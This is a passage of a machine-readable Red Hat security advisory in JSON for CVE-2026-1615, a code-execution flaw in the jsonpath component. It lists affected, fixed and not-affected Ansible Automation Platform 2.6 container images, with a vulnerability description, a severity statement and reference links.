"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437875"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the jsonpath component. This vulnerability allows a remote attacker to achieve arbitrary code execution by supplying a malicious JSON Path expression. The component\u0027s reliance on the `static-eval` module for processing user-supplied input leads to unsafe evaluation. Successful exploitation can result in Remote Code Execution (RCE) in Node.js environments or Cross-site Scripting (XSS) in browser contexts.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jsonpath: jsonpath: Arbitrary Code Execution via unsafe JSON Path expression evaluation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Product Security team has rated this vulnerability as Important as it may allows arbitrary code execution when processing untrusted JSON Path expressions. This can lead to Remote Code Execution in Node.js environments or Cross-site Scripting in browser contexts. In some contexts it may be possible to remotely exploit this flaw without any privileges. However, within Red Hat products the jsonpath component is used as a transitive dependency or does not directly handle user input. This context reduces exposure and criticality of this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-1615"
},
{
"category": "external",
"summary": "RHBZ#2437875",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437875"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-1615",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1615"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1615",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1615"
},
{
"category": "external",
